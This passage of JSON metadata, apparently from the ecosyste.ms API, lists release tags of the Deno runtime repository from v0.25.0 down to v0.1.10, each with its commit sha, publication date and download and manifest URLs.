5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"}